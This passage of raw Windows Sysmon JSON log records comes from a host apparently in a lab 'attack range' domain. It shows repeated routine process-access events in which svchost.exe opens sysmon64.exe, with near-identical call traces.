05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1305,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1306,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1307,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1308,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1309,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1310,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1311,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1312,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 